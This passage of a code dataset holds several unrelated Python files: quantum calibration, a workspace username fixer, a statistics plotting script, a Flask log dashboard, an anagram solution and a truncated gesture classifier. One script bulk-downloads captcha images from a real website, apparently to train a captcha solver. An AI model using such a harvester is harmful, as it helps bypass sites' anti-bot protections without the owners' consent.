any]:\n \"\"\"Add the oscillation frequency of the experiment to the metadata.\"\"\"\n metadata = super()._metadata()\n metadata[\"osc_freq\"] = self.experiment_options.osc_freq\n metadata[\"cal_param_value\"] = self._cals.get_parameter_value(\n self._param_name,\n self.physical_qubits,\n group=self.experiment_options.group,\n )\n\n return metadata\n\n def _attach_calibrations(self, circuit: QuantumCircuit):\n \"\"\"Adds the calibrations to the transpiled circuits.\"\"\"\n schedule = self._cals.get_schedule(\"sx\", self.physical_qubits)\n circuit.add_calibration(\"sx\", self.physical_qubits, schedule)\n\n def update_calibrations(self, experiment_data: ExperimentData):\n \"\"\"Update the frequency using the reported frequency less the imparted oscillation.\"\"\"\n\n result_index = self.experiment_options.result_index\n osc_freq = experiment_data.metadata[\"osc_freq\"]\n group = experiment_data.metadata[\"cal_group\"]\n old_freq = experiment_data.metadata[\"cal_param_value\"]\n\n fit_freq = BaseUpdater.get_value(experiment_data, \"freq\", result_index)\n new_freq = old_freq + fit_freq - osc_freq\n\n BaseUpdater.add_parameter_value(\n self._cals,\n experiment_data,\n new_freq,\n self._param_name,\n group=group,\n 
)\n","repo_name":"Qiskit-Extensions/qiskit-experiments","sub_path":"qiskit_experiments/library/calibration/frequency_cal.py","file_name":"frequency_cal.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"85"} +{"seq_id":"37678149050","text":"'''\nCreated on 19 Jun 2021\n\n@author: pgm\n'''\nimport acq400_hapi\nimport argparse\nimport os\nimport re\nimport sys\n\ndef ui():\n parser = argparse.ArgumentParser(description='acq400_remote_script') \n parser.add_argument('-v','--verbose', default=0, help=\"show more info\")\n parser.add_argument('--olduser', default=None, help=\"user name to change\")\n parser.add_argument('--newuser', default=None, help=\"user name to change\")\n# parser.add_argument('--uuts', default=None, help=\"uuts to change [uut[1][,uut2[,uut3...]]]]\")\n parser.add_argument('ws', nargs='+', help=\"workspace[s] to change\")\n args = parser.parse_args()\n return args\n \n\n# ASCII ROOLS OK, BackSlash, ForwardSlash\nBS = 0x5c\nFS = 0x2f\n\n# URI is in Unix notation, AND must have leading FS\n'''\n[pgm@hoy5 acq400_hapi]$ hexdump -C /home/pgm/SANDBOX/DOC-215920-01-FAT/.metadata/.plugins/org.eclipse.core.resources/.projects/ACQ400/.location\n00000000 40 b1 8b 81 23 bc 00 14 1a 25 96 e7 a3 93 be 1e |@...#....%......|\n00000010 00 2d 55 52 49 2f 2f 66 69 6c 65 3a 2f 43 3a 2f |.-URI//file:/C:/|\n00000020 55 73 65 72 73 2f 70 67 6d 30 30 2f 50 52 4f 4a |Users/pgm00/PROJ|\n00000030 45 43 54 53 2f 41 43 51 34 30 30 43 53 53 2f 41 |ECTS/ACQ400CSS/A|\n00000040 43 51 34 30 30 00 00 00 00 00 00 00 00 c0 58 fb |CQ400.........X.|\n00000050 f3 23 bc 00 14 1a 51 f3 8c 7b bb 77 c6 |.#....Q..{.w.|\n\n'''\n\ndef fixup(args, ws):\n print(\"fixup {}\".format(ws))\n for subdir, dirs, files in os.walk(ws):\n for file in files:\n path = subdir+os.sep+file\n print(path)\n file_changed = False\n wmode = None\n \n if path.endswith(\".old\"):\n continue\n \n try:\n with open(path, 'r') as fp:\n text = fp.read()\n for match in re.finditer(args.pat, text):\n print(\"MATCH {} start:{} end:{}\".format(match, match.start(), match.end()))\n file_changed = True\n wmode = 'w'\n \n if file_changed:\n text = text.replace(args.olduser, args.newuser)\n \n except UnicodeDecodeError:\n with open(path, 'rb') as fp:\n text = fp.read()\n \n for match in re.finditer(args.bpat, text):\n print(\"Binary File match {} start:{} end:{}\".format(match, match.start(), match.end()))\n print(\"here is our match {}\".format(text[match.start():match.end()]))\n print(\"here is what's next {}\".format(text[match.end():match.end()+20]))\n trailer_start = match.end()\n trailer_end = trailer_start+1\n while text[trailer_end] != 0:\n trailer_end += 1\n headroom_end = trailer_end + 1\n while text[headroom_end] == 0:\n headroom_end += 1\n print(\"trailer {}, headroom {}\".format(text[trailer_start:trailer_end], headroom_end - trailer_end))\n \n sub_bytes = args.newuser.encode()\n if len(sub_bytes) > (match.end() - match.start()) + (headroom_end - trailer_end):\n print(\"ERROR: unable to fit new name {} in binary file\".format(args.user))\n sys.exit(1)\n trailer = text[trailer_start:trailer_end]\n cursor = match.start()\n text = bytearray(text)\n for b in sub_bytes:\n text[cursor] = b\n cursor += 1\n for b in trailer:\n text[cursor] = b\n cursor += 1\n for x in range(cursor, headroom_end):\n text[cursor] = 0\n cursor += 1\n file_changed = True\n wmode = 'wb'\n if file_changed:\n print(\"acting on file_changed {}\".format(path))\n os.rename(path, 
path+\".old\")\n with open(path, wmode) as fp:\n fp.write(text)\n\n \ndef run_main():\n args = ui()\n #args.pat = re.compile(r'/home/pgm/')\n args.pat = re.compile('({})'.format(args.olduser))\n args.bpat = re.compile(('(' + args.olduser + ')' ).encode())\n for ws in args.ws:\n fixup(args, ws)\n \n \n\n\n# execution starts here\n\nif __name__ == '__main__':\n run_main()","repo_name":"D-TACQ/acq400_hapi","sub_path":"user_apps/utils/fixup_css_ws.py","file_name":"fixup_css_ws.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"14439881795","text":"print(__doc__)\n# Compare the estiamted partial correlation with the ground truth\n# Figure 7\n\nfrom MyFunc import myglasso,mylasso,myelastic,myenetpath,mylassopath\nimport numpy as np\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.datasets import make_sparse_spd_matrix\n\n# load data\nX=np.genfromtxt('data/data.csv',delimiter=',')\ncov=np.genfromtxt('data/true_cov.csv',delimiter=',')\nprec=np.genfromtxt('data/true_prec.csv',delimiter=',')\n\nn_samples, n_features=X.shape\npart=np.zeros((n_features,n_features))\nfor i in range(n_features):\n for j in range(n_features):\n part[i,j]=-prec[i,j]/np.sqrt(prec[i,i]*prec[j,j])\n\n# Graphical lasso\nglam=np.array([0.4141])\ngpart,gprec,gcov=myglasso(X, lam=glam)\ngrmse=np.linalg.norm(gpart - part, ord='fro')\n\n# Lasso\nllam=np.array([0.5922])\nlpart,tor=mylasso(X,lam=llam)\nlrmse=np.linalg.norm(lpart - part, ord='fro')\n\n# Elastic Net\nelam=np.array([1.3368])\nealpha=np.array([0.2678])\nepart, tor=myelastic(X, lam=elam,alpha=ealpha)\nermse=np.linalg.norm(epart - part, ord='fro')\n\nprint('graphical lasso error: %f\\nlasso error: %f\\nelastic net error: %f' %(grmse,lrmse,ermse))\n\n# plot\nplt.figure(1)\nplt.subplots_adjust(left=0.02,right=0.98)\nvmax=np.maximum(part.max(),abs(part.min()))\nplt.subplot(1,4,1)\nplt.imshow(gpart, interpolation='nearest', vmin=-vmax, vmax=vmax, cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('Graphical Lasso, RSE=%f' % grmse)\nplt.subplot(1,4,2)\nplt.imshow(lpart,interpolation='nearest',vmin=-vmax,vmax=vmax,cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('Lasso Penalized, RSE=%f' % lrmse)\nplt.subplot(1,4,3)\nplt.imshow(epart,interpolation='nearest',vmin=-vmax,vmax=vmax,cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('Elastic Net Penalized, RSE=%f' % ermse)\nplt.subplot(1,4,4)\nplt.imshow(part,interpolation='nearest',vmin=-vmax,vmax=vmax,cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('True Partial Correlation')\nplt.show()\n\nplt.figure(2)\nt=np.triu(np.ones((n_features,n_features)),1)\npart2=part[np.nonzero(t)]\ngpart2=gpart[np.nonzero(t)]\nlpart2=lpart[np.nonzero(t)]\nepart2=epart[np.nonzero(t)]\nplt.subplot(3,1,1)\nplt.plot(part2.flatten(),color='r',linestyle='--',label='True')\nplt.plot(gpart2.flatten(),color='b',label='Graphical lasso')\nplt.legend(prop={'size':10})\nplt.xlabel('locations')\nplt.ylabel('coefficient')\n\nplt.subplot(3,1,2)\nplt.plot(part2.flatten(),color='r',linestyle='--',label='True')\nplt.plot(lpart2.flatten(),label='Lasso')\nplt.legend(prop={'size':10})\nplt.xlabel('locations')\nplt.ylabel('coefficient')\n\nplt.subplot(3,1,3)\nplt.plot(part2.flatten(),color='r',linestyle='--',label='True')\nplt.plot(epart2.flatten(),label='Elastic 
Net')\nplt.legend(prop={'size':10})\nplt.xlabel('locations')\nplt.ylabel('coefficient')\n\nplt.show()","repo_name":"hcz28/partial_correlation","sub_path":"HResult.py","file_name":"HResult.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7074365964","text":"import os\nimport requests\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\n\ndef downloads_pic(pic_path, pic_name):\n url = 'https://www.jufaanli.com/home/Server/identitycode?0.7052675594065716'\n res = requests.get(url, stream=True)\n if not os.path.exists(pic_path):\n os.mkdir(pic_path)\n\n with open(os.path.join(pic_path, pic_name+'.gif'), 'wb') as f:\n for chunk in res.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n f.flush()\n f.close()\n\n\nfor i in range(2445,10001 - 2444):\n downloads_pic('images', str(i))","repo_name":"liangtaohy/LotusSpider","sub_path":"captcha/jufaanli_captcha_pics.py","file_name":"jufaanli_captcha_pics.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12748748735","text":"# TODO: Add expand modebar button to open the graph in a modal window\n\nimport base64\nimport os\nimport re\nimport time\nimport urllib.parse\nfrom copy import deepcopy\n\nimport pandas\nfrom flask import Blueprint, Flask, current_app, render_template\n\nfrom pyweblogalyzer.dataset.weblogdata import WebLogData\n\nappblueprint = Blueprint(\"dashboard\", __name__)\n\n\ndef hex_color_to_rgba(hex_color, opacity):\n \"\"\"Convert a color code string like '#123' or '#123456' to an rgba with opacity like 'rgba(12,34},56},0.2})'\"\"\"\n hex = hex_color.replace('#', '')\n\n if len(hex) == 3:\n hex = f\"${hex[0]}${hex[0]}${hex[1]}${hex[1]}${hex[2]}${hex[2]}\"\n\n r = int(hex[0:2], 16)\n g = int(hex[2:4], 16)\n b = int(hex[4:6], 16)\n return f\"rgba({r},{g},{b},{opacity / 100})\"\n\n\nclass DashboardApp(Flask):\n CONFIG_KEY_DASHBOARDS = \"DASHBOARDS_CONFIG\"\n CONFIG_KEY_BADGE_TITLE = \"badge_title\"\n CONFIG_KEY_BADGE_TYPE = \"badge_type\"\n CONFIG_KEY_TABLE_TITLE = \"table_title\"\n CONFIG_KEY_COUNT_TITLE = \"count_title\"\n CONFIG_KEY_TABLE_ORDER = \"table_order\"\n CONFIG_KEY_TABLE_HIDE = \"table_hide\"\n CONFIG_KEY_DISPLAY_COLS = \"display_cols\"\n CONFIG_KEY_GROUP_BY_COLS = \"group_by_cols\"\n CONFIG_KEY_CONTEXTUAL = \"contextual\"\n CONFIG_KEY_FILTER = \"filter\"\n CONFIG_KEY_ONCLICK = \"on_click\"\n CONFIG_KEY_LARGE = \"large\"\n CONFIG_KEY_TIME_GROUP = \"time_group\"\n CONFIG_KEY_TIME_TITLE = \"time_title\"\n CONFIG_KEY_GRAPH = \"graph_config\"\n CONFIG_KEY_ALLOW_EMPTY = \"allow_empty\"\n CONFIG_TEXT_RENDERER_REGEX = \"\\{\\{(?P[\\d\\s\\w]*)\\}\\}\"\n DEFAULT_GEO_MARKER_MAX_SIZE = 100\n DEFAULT_BADGE_TYPE = \"gray\"\n\n def __init__(self, dataset, config_class, config_env: None):\n super().__init__(__name__)\n self._dataset = dataset\n self.renderer_parser = re.compile(self.CONFIG_TEXT_RENDERER_REGEX)\n\n self.config.from_object(config_class)\n if config_env and os.environ.get(config_env):\n self.config.from_envvar(config_env)\n\n self.register_blueprint(appblueprint)\n\n def run(self):\n \"\"\"Start the web app.\"\"\"\n # Don't use the reloader as it restarts the app dynamically, creating a new collector\n super().run(host=self.config[\"HOST\"], port=self.config[\"PORT\"], debug=self.config[\"DEBUG\"], use_reloader=False)\n self.logger.info(\"Dashboard 
started, listening on port {self.config['PORT']}\")\n\n def get_dashboard_table_data(\n self,\n logdata,\n display_cols,\n groupby_cols=None,\n count_title=None,\n filter=None,\n value=None,\n time_group=None,\n time_title=None,\n allow_empty=False,\n ):\n \"\"\"Compute the data table for this dashboard.\"\"\"\n tabledata = logdata\n\n # Filter rows based on the value if specified\n if filter and value:\n # If the filter is not a valid column, check if it is period and the value a timestamp\n if filter not in tabledata.columns:\n try:\n start_time = pandas.Timestamp(value)\n time_delta = pandas.Timedelta(filter)\n tabledata = logdata.loc[start_time:start_time + time_delta]\n except ValueError:\n self.logger.warning(f\"Filter {filter} value {value} is not a column nor a time period, ignoring\")\n else:\n # Convert the value to int or float if it represents a number\n if value.isdigit():\n value = int(value)\n else:\n try:\n value = float(value)\n except ValueError:\n pass\n tabledata = tabledata[tabledata[filter] == value]\n\n # Filter out to keep specify columns\n if display_cols:\n # tabledata = tabledata[display_cols].dropna()\n tabledata = tabledata[display_cols]\n if not allow_empty:\n tabledata = tabledata.dropna()\n\n # If grouping specified, add a column with the duplicates count\n if groupby_cols:\n tabledata[count_title] = tabledata.groupby(groupby_cols)[groupby_cols[0]].transform('size')\n tabledata = tabledata.drop_duplicates(subset=groupby_cols)\n # Not really necessary as js will reorder re_index()\n tabledata.sort_values(by=count_title , axis=0, inplace=True, ignore_index=True, ascending=False)\n\n # If time grouping is specified\n if time_group:\n # Create a column with a unit to be summed up by period, and set the ts col to 1 to avoid it being removed\n tabledata[time_title] = 1\n tabledata['timestamp'] = 1\n tabledata = tabledata.groupby(pandas.Grouper(freq=time_group)).sum()\n # Update the timestamp column with a string version of the period time\n tabledata['timestamp'] = tabledata.index.strftime(WebLogData.DASHBOARD_TIMESTAMP_EXPORT_FORMAT)\n # tabledata['timestamp'] = tabledata.index.astype(numpy.int64) // 10 ** 6\n\n # print(f\"pipo {tabledata}\")\n return tabledata\n\n def _render_config(self, graph_config):\n \"\"\"Update the chart.js graph config to fill missing fields and replace labels and datasets.\n If the config is not valid; the graph will be ignored\n \"\"\"\n # DEFAULT_GRAPH_COLORS = [\n # \"#3e95cd\", \"#8e5ea2\", \"#3cba9f\", \"#e8c3b9\", \"#c45850\",\n # \"#F92672\", \"#FD971F\", \"#E69F66\", \"#E6DB74\", \"#A6E22E\",\n # \"#66D9EF\", \"#AE81FF\", \"#272822\", \"#F8F8F2\", \"#75715E\",\n # ]\n # DEFAULT_GRAPH_BG_COLORS = [hex_color_to_rgba(color, 40) for color in DEFAULT_GRAPH_COLORS]\n DEFAULT_OPTIONS = {\n 'data': {\n 'fill': 'tozeroy',\n 'line': {\n 'shape': 'spline',\n },\n },\n 'layout': {\n 'height': 250,\n 'automargin': True,\n 'autosize': True,\n 'margin': {'l': 60, 'r': 20, 't': 30, 'b': 65, 'pad': 4},\n 'plot_bgcolor': '#F5F5F5',\n 'paper_bgcolor': \"rgba(0,0,0,0)\",\n \"geo\": {\n \"scope\": 'world',\n \"showland\": True,\n \"landcolor\": 'rgb(217, 217, 217)',\n \"subunitwidth\": 1,\n \"countrywidth\": 1,\n \"subunitcolor\": 'rgb(255,255,255)',\n \"countrycolor\": 'rgb(255,255,255)',\n \"showcoastlines\": False,\n \"showocean\": True,\n # \"showrivers\": True,\n \"showcountries\": True,\n \"showsubunits\": True,\n \"subunitcolor\": 'rgb(255,255,255)',\n \"subunitwidth\": 1,\n \"showland\": True,\n \"resolution\": 50,\n \"showframe\": False,\n 
},\n },\n 'config': {\n 'scrollZoom': True,\n 'responsive': True,\n },\n }\n\n # Make sure to render a copy and not update the config\n rendered_config = deepcopy(graph_config)\n\n # Check required info are present\n for field in ['data', 'layout']:\n if field not in rendered_config:\n self.logger.warning(f\"Graph config missing required field {field}, graph ignored({rendered_config})\")\n return None\n\n # Fill missing config with defaults\n if 'config' not in rendered_config:\n rendered_config['config'] = DEFAULT_OPTIONS['config']\n else:\n for key in DEFAULT_OPTIONS['layout']:\n rendered_config['layout'].setdefault(key, DEFAULT_OPTIONS['layout'][key])\n\n # Fill default layout\n for key in DEFAULT_OPTIONS['layout']:\n rendered_config['layout'].setdefault(key, DEFAULT_OPTIONS['layout'][key])\n\n # Fill default dataset options and set empty label and data list\n for dataset in rendered_config['data']:\n for key in DEFAULT_OPTIONS['data']:\n for dataset in rendered_config['data']:\n dataset.setdefault(key, DEFAULT_OPTIONS['data'][key])\n for axis_key in self._get_dataset_axis_labels(dataset):\n rendered_config[axis_key] = []\n\n return rendered_config\n\n def _render_graph_text(self, text_template, tabledata):\n fields = self.renderer_parser.findall(text_template)\n labels = []\n for idx in range(len(tabledata)):\n txt = text_template\n for field in fields:\n txt = txt.replace(\"{{\" + field + \"}}\", str(tabledata[field][idx]))\n labels.append(txt)\n return labels\n\n def _get_dataset_axis_labels(self, dataset_config):\n \"\"\"Returns the key couple present in the dict.\"\"\"\n key_sets = [[\"x\", \"y\"], [\"values\", \"labels\"], [\"lat\", \"lon\"]]\n for keyset in key_sets:\n if all(key in dataset_config for key in keyset):\n return keyset\n self.logger.error(f\"No key found for graph axis data in {dataset_config.keys()}\")\n return []\n\n def _get_graph_dataset_columns(self, graph_config):\n \"\"\"Extract the xaxis column name, and the list of yaxis columnn names.\"\"\"\n try:\n xaxis = []\n yaxis = []\n for dataset in graph_config['data']['data']:\n xaxis.append(graph_config['data']['labels'])\n yaxis = [dataset['data'] for dataset in graph_config['data']['datasets']]\n return xaxis, yaxis\n except KeyError as e:\n self.log.warning(f\"Missing key {e} in graph config, ignoring graph data\")\n return None, None\n\n def _get_badge_id(self, dashboard_id):\n \"\"\"Build a badge id for this dashboard's badge.\"\"\"\n return f\"{dashboard_id}_badge\"\n\n def get_dashboard(self):\n \"\"\"Build the html dashboard page with no data.\"\"\"\n badges = {}\n dashboards = {}\n for db_id, db in self.config[self.CONFIG_KEY_DASHBOARDS].items():\n if not db.get(self.CONFIG_KEY_CONTEXTUAL, False):\n if db.get(self.CONFIG_KEY_BADGE_TITLE):\n badges[self._get_badge_id(db_id)] = {\n \"title\": db[self.CONFIG_KEY_BADGE_TITLE],\n \"type\": db.get(self.CONFIG_KEY_BADGE_TYPE, self.DEFAULT_BADGE_TYPE),\n }\n cols = deepcopy(db.get(self.CONFIG_KEY_DISPLAY_COLS, []))\n if db.get(self.CONFIG_KEY_COUNT_TITLE):\n cols.append(db[self.CONFIG_KEY_COUNT_TITLE])\n if db.get(self.CONFIG_KEY_TIME_TITLE):\n cols.append(db[self.CONFIG_KEY_TIME_TITLE])\n\n # If this db is large, but not at the beginning of a row, add an empty db\n if db.get(self.CONFIG_KEY_LARGE) and len(dashboards) % 2 != 0:\n dashboards[\"_empty_\"] = {\"title\": \"\"}\n\n dashboards[db_id] = {\n \"title\": db[self.CONFIG_KEY_TABLE_TITLE],\n \"columns\": cols,\n \"order\": db.get(self.CONFIG_KEY_TABLE_ORDER),\n \"hide\": db.get(self.CONFIG_KEY_TABLE_HIDE, 
[]),\n }\n\n # If context db, add filter column\n ctxt_db = self.config[self.CONFIG_KEY_DASHBOARDS].get(db.get(self.CONFIG_KEY_ONCLICK))\n if ctxt_db:\n dashboards[db_id][\"ctxt_filter\"] = ctxt_db.get(self.CONFIG_KEY_FILTER)\n\n # Add graph data if specified\n graph_config = db.get(self.CONFIG_KEY_GRAPH)\n if graph_config:\n dashboards[db_id][\"graph_config\"] = self._render_config(graph_config)\n\n # If this db is large, add an invisible db to take the next slot\n if db.get(self.CONFIG_KEY_LARGE):\n dashboards[db_id][\"large\"] = True\n dashboards[\"_hidden_\"] = {\"title\": \"\"}\n\n return render_template('index.html', badges=badges, dashboards=dashboards, config=self.config)\n\n def get_dashboard_data(self):\n \"\"\"Get dashboard data to fill the html page.\"\"\"\n start_time = time.time()\n # Get the latest data\n logdata = self._dataset.get_dataframe()\n\n # Build a widget for each dashboard in the config\n display_data = []\n for dashboard_id, dashboard in self.config[self.CONFIG_KEY_DASHBOARDS].items():\n if not dashboard.get(self.CONFIG_KEY_CONTEXTUAL, False):\n db_data = {}\n tabledata = self.get_dashboard_table_data(\n logdata,\n display_cols=dashboard.get(self.CONFIG_KEY_DISPLAY_COLS, []),\n groupby_cols=dashboard.get(self.CONFIG_KEY_GROUP_BY_COLS),\n count_title=dashboard.get(self.CONFIG_KEY_COUNT_TITLE, \"count\"),\n time_group=dashboard.get(self.CONFIG_KEY_TIME_GROUP),\n time_title=dashboard.get(self.CONFIG_KEY_TIME_TITLE, \"tcount\"),\n allow_empty=dashboard.get(self.CONFIG_KEY_ALLOW_EMPTY, False)\n )\n\n # If this db has a badge\n if dashboard.get(self.CONFIG_KEY_BADGE_TITLE):\n db_data[\"badge_id\"] = self._get_badge_id(dashboard_id)\n db_data[\"badge_value\"] = len(tabledata)\n\n # Dashboard table data\n db_data[\"db_id\"] = dashboard_id\n db_data[\"table_data\"] = tabledata.values.tolist()\n\n graph_config = dashboard.get(self.CONFIG_KEY_GRAPH)\n if graph_config and 'layout' in graph_config:\n graph_data = {}\n for dataset in graph_config['data']:\n for key in self._get_dataset_axis_labels(dataset):\n graph_data.setdefault(key, [])\n graph_data[key].append(tabledata[dataset[key]].tolist())\n # For geo graphs, render text property\n if dataset.get(\"type\") == 'scattergeo':\n if 'text' in dataset:\n # Render the geo graph test to replace vars with column field values\n graph_data.setdefault('text', [])\n graph_data['text'].append(self._render_graph_text(dataset['text'], tabledata))\n if 'marker' in dataset:\n # If a marker size is specified as a string, replace it with the computed values\n size = dataset['marker'].get('size')\n if isinstance(size, str):\n graph_data.setdefault('marker', [])\n graph_data['marker'].append(self._render_marker_size(tabledata, dataset))\n\n db_data[\"graph_data\"] = graph_data\n display_data.append(db_data)\n\n page_data = {\n \"dashboards\": display_data,\n \"start_date\": logdata.index[0].strftime(self.config['DASHBOARD_RANGE_TIME_FORMAT']),\n \"end_date\": logdata.index[len(logdata) - 1].strftime(self.config['DASHBOARD_RANGE_TIME_FORMAT']),\n }\n\n self.logger.info(f\"Request exec time: {time.time()-start_time}\")\n return page_data\n\n def _render_marker_size(self, tabledata, dataset):\n marker_data = deepcopy(dataset['marker'])\n size = dataset['marker'].get('size')\n\n # Compute the dynamuc marker size between sizemin and sizemax\n # where sizemax is the biggest value in the table\n sizes = tabledata[size]\n maxsz = dataset['marker'].get('sizemax', self.DEFAULT_GEO_MARKER_MAX_SIZE)\n ratio = maxsz / max(sizes)\n marker_data[\"size\"] 
= [int(sizes[idx] * ratio) for idx in range(len(tabledata))]\n return marker_data\n\n def context_data(self, dashboard, key):\n parent_dashboard_config = self.config[self.CONFIG_KEY_DASHBOARDS].get(dashboard)\n ctxt_db = parent_dashboard_config.get(self.CONFIG_KEY_ONCLICK)\n # Only proceed further if a contextual dashboard is configured\n if ctxt_db:\n parent_time_group = parent_dashboard_config.get(self.CONFIG_KEY_TIME_GROUP)\n dashboard_config = self.config[self.CONFIG_KEY_DASHBOARDS].get(ctxt_db)\n\n # If the timestamp is the filter and the parent db is time grouped, filter by this time period\n filter = dashboard_config.get(self.CONFIG_KEY_FILTER)\n if parent_time_group and filter == \"timestamp\":\n filter = parent_time_group\n\n if dashboard_config:\n logdata = self._dataset.get_dataframe()\n tabledata = self.get_dashboard_table_data(\n logdata,\n display_cols=dashboard_config.get(self.CONFIG_KEY_DISPLAY_COLS, []),\n groupby_cols=dashboard_config.get(self.CONFIG_KEY_GROUP_BY_COLS),\n count_title=dashboard_config.get(self.CONFIG_KEY_COUNT_TITLE, \"count\"),\n filter=filter,\n value=key\n )\n title = dashboard_config[\"table_title\"].format(key)\n modal_data = {}\n modal_data[\"table_id\"] = \"db-modal-table\"\n modal_data[\"table_cols\"] = tabledata.columns.tolist()\n modal_data[\"table_data\"] = tabledata.values.tolist()\n modal_data[\"html\"] = render_template('modal.html', modal_data=modal_data, table_title=title)\n return modal_data\n else:\n self.logger.warning(f\"No dashboard {dashboard}, check the configuration\")\n return \"\"\n\n\n@appblueprint.route(\"/\", methods=[\"GET\"])\ndef get_index():\n return current_app.get_dashboard()\n\n\n@appblueprint.route(\"/data\", methods=[\"GET\"])\ndef get_data():\n return current_app.get_dashboard_data()\n\n\n@appblueprint.route(\"/context//\", methods=[\"GET\"])\ndef get_context_data(dashboard, key):\n # Declode parameters. dashboard is escaped, and key is base64 encoded\n decoded_dashboard = urllib.parse.unquote(dashboard)\n decoded_key = base64.b64decode(key.encode()).decode()\n return current_app.context_data(decoded_dashboard, decoded_key)\n","repo_name":"vche/pyweblogalyzer","sub_path":"src/pyweblogalyzer/dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36907810887","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven two strings s and t , write a function to determine if t is an anagram of s.\n\nExample 1:\n\nInput: s = \"anagram\", t = \"nagaram\"\nOutput: true\nExample 2:\n\nInput: s = \"rat\", t = \"car\"\nOutput: false\nNote:\nYou may assume the string contains only lowercase alphabets.\n\nFollow up:\nWhat if the inputs contain unicode characters? 
How would you adapt your solution to such case?\n\"\"\"\n\n__mtime__ = '2018/12/8'\n\n\n# Run 36 ms\nclass Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n\n if len(s) != len(t):\n return False\n\n alphabets = [0] * 26\n ord_a = ord('a')\n for i, c in enumerate(s):\n pos = ord(c) - ord_a\n alphabets[pos] += 1\n pos = ord(t[i]) - ord_a\n alphabets[pos] -= 1\n\n for i in range(26):\n if alphabets[i] != 0:\n return False\n return True\n","repo_name":"lee2014/interview_code","sub_path":"leetcode/242_valid_anagram.py","file_name":"242_valid_anagram.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41356142918","text":"import os, io, json\nimport numpy as np\nimport cv2\nimport keras\nimport time\nimport tensorflow as tf\nfrom tensorflow.python.keras.backend import set_session\nfrom tensorflow.python.keras.models import load_model\nfrom keras.models import Model\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\nclass Classifier:\n\tglobal model\n\tglobal graph\n\tglobal session\n\tsession = tf.Session(graph=tf.Graph())\n\n\tdata = {'videoName' : 'stream', 'segmentNumber' : 0, 'gestures' :[]}\n\tframes = []\n\tfps = 0\n\n\tlabels = []\n\twith open('labels.json') as jsonFile:\n\t\tdata = json.load(jsonFile)\n\t\tfor p in data['list']:\n\t\t\tlabels.append(p['name'])\n\n\tdef load(self):\n\t\ttry:\n\n\t\t\t#session = tf.Session(graph=tf.Graph().as_default())\n\t\t\twith session.graph.as_default():\n\t\t\t\tkeras.backend.set_session(session)\n\t\t\t\tself.model = load_model('Gesture-Recognition-with-3DRESNET/model/3D_RESNET_101_drop_0.5/model.best.hdf5')\n\n\t\t\t\tprint(\"Model successfully loaded from disk.\")\n\n\t\t\t#compile again\n\t\t\t\tself.model.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n\t\texcept:\n\t\t\tprint(\"Model not found\")\n\t\t\treturn None\n\n\n\tdef getFrames(self, videoName, segmentNumber):\n\t\tduration = 1\n\t\twith open('segmentFiles/' + str(videoName[0:videoName.index('.')]) + 'Segments.json') as json_file:\n\t\t\tdata = json.load(json_file)\n\t\t\tduration = float(data['videoDuration'])\n\t\t\tstart = float((data['segments'][segmentNumber])['start'])\n\t\t\tend = float((data['segments'][segmentNumber])['end'])\n\n\t\timg_rows,img_cols=96, 64\n\t\tvideoFrames = []\n\t\tvidcap = cv2.VideoCapture('videoFiles/' + str(videoName))\n\t\tsuccess,frame = vidcap.read()\n\n\t\tif not success:\n\t\t\tprint('could not load video')\n\t\twhile success:\n\t\t\tframe = cv2.flip(frame, 3)\n\t\t\tframe = cv2.resize(frame, (640,480))\n\n\t\t\timage=cv2.resize(frame,(img_rows,img_cols),interpolation=cv2.INTER_AREA)\n\t\t\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\tvideoFrames.append(gray)\n\t\t\tsuccess,frame = vidcap.read()\n\n\t\tself.fps = float(len(videoFrames) / duration)\n\t\tvideoFrames = videoFrames[int(self.fps*start):(int(self.fps*end) + 1)]\n\n\t\tratio = len(videoFrames) / 16\n\t\tindex = 0\n\t\tframes = []\n\t\tfor i in range(16):\n\t\t\tframes.append(videoFrames[int(index)])\n\t\t\tindex += ratio\n\n\t\treturn frames\n\n\tdef classify(self, videoName, mode, segmentNumber=0):\n\t\timg_rows,img_cols=96, 64\n\n\t\tif mode == 0:\n\t\t\tself.frames = self.getFrames(videoName, int(segmentNumber))\n\t\telse:\n\t\t\tframe = cv2.imread('streamFiles/' + videoName + '.jpeg')\n\t\t\tframe = cv2.flip(frame, 3)\n\t\t\tframe = cv2.resize(frame, 
